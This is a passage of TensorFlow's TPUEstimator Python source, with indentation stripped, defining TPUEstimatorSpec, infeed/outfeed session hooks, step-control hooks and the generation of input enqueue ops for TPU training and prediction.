'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator's evaluate() increments the eval step by 1 by default, so we
# add the remaining difference here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function are
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
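A minimal illustrative sketch of `eval_metrics` (the names `my_metric_fn`,
`labels`, and `logits` below are hypothetical, not part of this API):

  def my_metric_fn(labels, logits):
    # Runs on the CPU host once the tensors from all shards are concatenated.
    predictions = tf.argmax(logits, axis=1)
    return {'accuracy': tf.compat.v1.metrics.accuracy(
        labels=labels, predictions=predictions)}

  spec = TPUEstimatorSpec(
      mode=mode,
      loss=loss,
      train_op=train_op,
      eval_metrics=(my_metric_fn, [labels, logits]))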
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shut down the TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._tpu_compile_op = tpu_compile_op
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on the TPU directly. Reinitializing
# the TPU would corrupt those variables, since the previously allocated memory
# might be overwritten for another purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
logging.error('Compilation failed: {}'.format(proto.status_error_message))
coord.request_stop()
else:
logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
logging.info('Init TPU system')
start = time.time()
with ops.Graph().as_default():
with tf_session.Session(
self._master, config=self._session_config) as sess:
sess.run(
tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
logging.info('Initialized TPU in %d seconds', time.time() - start)
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
logging.info('Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, tpu_compile_op,
rendezvous=None, master=None, session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
the following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value`, `unit`] that
represents the number of iterations or the time in seconds to run the
optimizer per loop, based on the `unit` specified (`count` or `seconds`
respectively).
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError(
'Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit`.')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations count is computed by choosing the smaller of (`final_step` -
`global_step`) and the initial estimated iterations returned by the
estimator (1 by default).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
logging.info("ElapsedTime: %.3f", elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model. But it makes the
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
Because this is provided as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
A list of enqueue ops, or a dict containing the enqueue ops and stopping signals.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
          # This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
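          # `split_inputs` separates any TPU-embedding features from the dense
          # features/labels; the returned enqueue data is consumed by the
          # embedding enqueue ops generated below when an embedding config is
          # present.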
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
enqueue_datas_list.append(enqueue_data)
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
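  # Maps a replica id to the TPU core ordinal it should be enqueued to: use
  # the device assignment when one is configured (model parallelism),
  # otherwise assume replicas are laid out consecutively on each host.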
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
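  # Places the enqueue ops for a replica on the host device that feeds it.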
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
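    # core_id tracks which slice of the (optionally SLICED) input goes to the
    # next replica; it is only advanced in the SLICED configuration.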
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
